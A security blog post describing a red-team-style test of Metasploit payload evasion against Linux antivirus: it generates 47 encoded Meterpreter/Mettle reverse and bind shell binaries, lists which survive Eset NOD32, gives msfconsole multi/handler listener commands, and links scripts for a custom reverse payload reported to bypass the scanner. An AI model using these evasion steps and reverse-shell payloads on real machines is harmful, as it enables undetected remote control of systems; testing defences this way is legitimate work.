Metasploit payloads evasion against Linux AV

Well there are not many Linux antivirus solutions out there, but from the few I think Avast, Eset and Kaspersky are among the best out there. Purpose of this article is not to promote one product over the other, but rather use them in a live example testing that could be part of a Red-Team exercise (if they ever go this path of course) to prepare against potential Antivirus software and to know what will get flagged and what will pass (Metasploit/Meterpreter/Mettle)

So for the sake of this exercise I have created a simple shell script generator that will produce various encoded executable Linux payloads of interest, which we will upload to a Linux Virtual machine (Ubuntu 18.04 x86_64) and let the installed AV handle the findings. What would be left would be the pieces that would theoretically work and bypass the AV, so we will test a few examples to verify their functionality.

I have concentrated on mainly the Linux  x86 and x86_64 Meterpreter/Mettle payloads with various encoder combinations. The shell script generator includes variable names that can be changes to use a combination of ones liking and automating the process of generating the binaries.

Make sure you place the below script in your metasploit-framework path and make it executable. The generator script is residing here ->

https://github.com/DoktorCranium/Linux-Meterpreter-tests/blob/master/Linux-meterpreter-tests/AV-TEST-LINUX.sh

When running the script you should input the Metasploit-framework LISTENING IP address and TCP Port for example :

In our first test scenario, we will be using the Eset NOD32 4.0.90 on Ubuntu 18.04 (x86_64)

Next we shall have a list of generated test payloads that we will feed to the remote machine with the Linux AV via scp. In our test we have generated 47 executables.

-rw-r--r-- 1 root root 1102368 Apr 23 23:44 aarch64-reverse_tcp2.elf
-rw-r--r-- 1 root root     332 Apr 23 23:43 aarch64-reverse_tcp.elf
-rw-r--r-- 1 root root 1030664 Apr 23 23:44 armle-reverse_tcp2.elf
-rw-r--r-- 1 root root     464 Apr 23 23:44 mipsbe-reverse_tcp.elf
-rw-r--r-- 1 root root     464 Apr 23 23:44 mipsle-reverse_tcp.elf
-rw-r--r-- 1 root root     162 Apr 23 23:39 x64-exec.elf
-rw-r--r-- 1 root root     162 Apr 23 23:39 x64-exec-xor.elf
-rw-r--r-- 1 root root     198 Apr 23 23:39 x64-mt-bind_tcp.elf
-rw-r--r-- 1 root root     239 Apr 23 23:39 x64-mt-bind_tcp-xor.elf
-rw-r--r-- 1 root root 1046472 Apr 23 23:39 x64-mt-reverse_tcp2.elf
-rw-r--r-- 1 root root     249 Apr 23 23:38 x64-mt-reverse_tcp.elf
-rw-r--r-- 1 root root 1046631 Apr 23 23:39 x64-mt-reverse_tcp-xor2.elf
-rw-r--r-- 1 root root     295 Apr 23 23:38 x64-mt-reverse_tcp-xor.elf
-rw-r--r-- 1 root root 1046472 Apr 23 23:39 x64-mt-rev-http.elf
-rw-r--r-- 1 root root 1046472 Apr 23 23:40 x64-mt-rev-https.elf
-rw-r--r-- 1 root root 1046631 Apr 23 23:39 x64-mt-rev-https-xor.elf
-rw-r--r-- 1 root root 1046631 Apr 23 23:39 x64-mt-rev-http-xor.elf
-rw-r--r-- 1 root root     206 Apr 23 23:40 x64-sh-bind_tcp2.elf
-rw-r--r-- 1 root root     198 Apr 23 23:40 x64-sh-bind_tcp.elf
-rw-r--r-- 1 root root     247 Apr 23 23:40 x64-sh-bind_tcp-xor2.elf
-rw-r--r-- 1 root root     239 Apr 23 23:40 x64-sh-bind_tcp-xor.elf
-rw-r--r-- 1 root root     249 Apr 23 23:40 x64-sh-reverse.elf
-rw-r--r-- 1 root root     194 Apr 23 23:40 x64-sh-reverse_tcp2.elf
-rw-r--r-- 1 root root     239 Apr 23 23:40 x64-sh-reverse_tcp-xor2.elf
-rw-r--r-- 1 root root     295 Apr 23 23:40 x64-sh-reverse-xor.elf
-rw-r--r-- 1 root root     122 Apr 23 23:41 x86-exec.elf
-rw-r--r-- 1 root root     257 Apr 23 23:41 x86-exec-xor.elf
-rw-r--r-- 1 root root     194 Apr 23 23:42 x86-mt-bind_tcp.elf
-rw-r--r-- 1 root root     329 Apr 23 23:41 x86-mt-bind_tcp-xor.elf
-rw-r--r-- 1 root root 1107556 Apr 23 23:41 x86-mt-reverse_tcp2.elf
-rw-r--r-- 1 root root     207 Apr 23 23:41 x86-mt-reverse_tcp.elf
-rw-r--r-- 1 root root 1107790 Apr 23 23:41 x86-mt-reverse_tcp-xor2.elf
-rw-r--r-- 1 root root     342 Apr 23 23:41 x86-mt-reverse_tcp-xor.elf
-rw-r--r-- 1 root root     614 Apr 23 23:43 x86-mt-reverse_tcp-xor.elf.multi
-rw-r--r-- 1 root root 1107556 Apr 23 23:42 x86-mt-rev-http.elf
-rw-r--r-- 1 root root 1107556 Apr 23 23:42 x86-mt-rev-https.elf
-rw-r--r-- 1 root root 1107790 Apr 23 23:42 x86-mt-rev-https-xor.elf
-rw-r--r-- 1 root root 1107790 Apr 23 23:42 x86-mt-rev-http-xor.elf
-rw-r--r-- 1 root root     162 Apr 23 23:43 x86-sh-bind_tcp2.elf
-rw-r--r-- 1 root root     194 Apr 23 23:43 x86-sh-bind_tcp.elf
-rw-r--r-- 1 root root     297 Apr 23 23:43 x86-sh-bind_tcp-xor2.elf
-rw-r--r-- 1 root root     329 Apr 23 23:42 x86-sh-bind_tcp-xor.elf
-rw-r--r-- 1 root root     207 Apr 23 23:43 x86-sh-reverse.elf
-rw-r--r-- 1 root root     152 Apr 23 23:43 x86-sh-reverse_tcp2.elf
-rw-r--r-- 1 root root     287 Apr 23 23:43 x86-sh-reverse_tcp-xor2.elf
-rw-r--r-- 1 root root     342 Apr 23 23:43 x86-sh-reverse-xor.elf

So once we have uploaded them the AV kicks in and auto-removes most of them of course

Once the process finishes we see that there are a few files left intact, out of these some won’t work, but some will, which we will test next… we have 27 files left

Out of these, lets see the x86_64 ones that would be of interest to us since the VM runs 64bit

-rw-r--r-- 1 user user 162 Apr 23 22:08 x64-exec-xor.elf
-rw-r--r-- 1 user user 162 Apr 23 22:08 x64-exec.elf
-rw-r--r-- 1 user user 198 Apr 23 22:08 x64-mt-bind_tcp.elf
-rw-r--r-- 1 user user 1046631 Apr 23 22:08 x64-mt-rev-http-xor.elf
-rw-r--r-- 1 user user 1046631 Apr 23 22:08 x64-mt-rev-https-xor.elf
-rw-r--r-- 1 user user 1046631 Apr 23 22:08 x64-mt-reverse_tcp-xor2.elf
-rw-r--r-- 1 user user 198 Apr 23 22:08 x64-sh-bind_tcp.elf

We will configure our test LISTENER (place the below script in the metasploit-framework directory and make executable)

https://github.com/DoktorCranium/Linux-Meterpreter-tests/blob/master/Linux-meterpreter-tests/LISTENER-LINUX-METTLE.sh

(And adjust to the tested remote payloads ie change line 13 accordingly)

echo -n './msfconsole -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; set LHOST ' > run.listener.sh

We need to modify the linux/x64/meterpreter/reverse_tcp to the corresponding payload in the LISTENER if we are going to verify anything apart from meterpreter/reverse_tcp

Will in this case become

echo -n './msfconsole -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter_reverse_tcp; set LHOST ' > run.listener.sh

The above will work with x64-mt-reverse_tcp-xor2.elf  since the platform is x64, and it is a meterpreter reverse tcp payload, so we will fire up our listener (please note the difference in the above 2 payloads !)

And execute the payload on the testing VM with Eset NOD32 AV and get a nice core-dumped message :)

So lets try other x86_64 ones with meterpreter/mettle we have next  to try -> x64-mt-bind_tcp.elf

So we adjust the LISTENER again this time with linux/x64/meterpreter/bind_tcp payload, this time however we need to add a remote IP for the bind_tcp to work (which kinda sucks) but we will test nevertheless, this time it works

But we want to have a working reverse meterpreter/mettle payload that bypasses Eset NOD32 !

So lets try some more custom code

https://github.com/DoktorCranium/Linux-Meterpreter-tests/blob/master/Linux-meterpreter-tests/LINUX-FORK-METTLE.sh

And upload the linux-payload to the VM with Nod32 and run the listener

Execute the linux-payload and … success we have bypassed the AV with custom reverse mettle payload :)

Did I mention that you can do the same for Windows PE32 ? No ? :) well now you know, it works just the same as on windows, and can be fully automated for AV evasion testing via the above scripts, scp, etc …

 

 

 

About astr0baby

Please run Adblock or similar... we have been told to do so since Carl Sagan wrote the Contact .
This entry was posted in Uncategorized. Bookmark the permalink.

3 Responses to Metasploit payloads evasion against Linux AV

  1. Pingback: Metasploit payloads evasion against Linux AV – Astr0baby’s not so random thoughts _____ rand() % 100; – The Library 6.0

  2. Pingback: Metasploit Payload在Linux平台的免杀 – NEWS.ALL

  3. Pingback: Metasploit Payload在Linux平台的免杀 - IcySun'Blog

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.